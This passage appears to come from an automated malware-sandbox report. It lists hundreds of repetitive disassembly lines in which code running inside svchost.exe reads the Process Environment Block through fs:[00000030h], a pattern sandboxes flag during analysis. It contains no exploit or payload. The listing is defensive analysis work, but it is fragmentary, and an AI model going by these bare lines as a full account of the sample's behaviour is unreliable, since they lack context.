          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
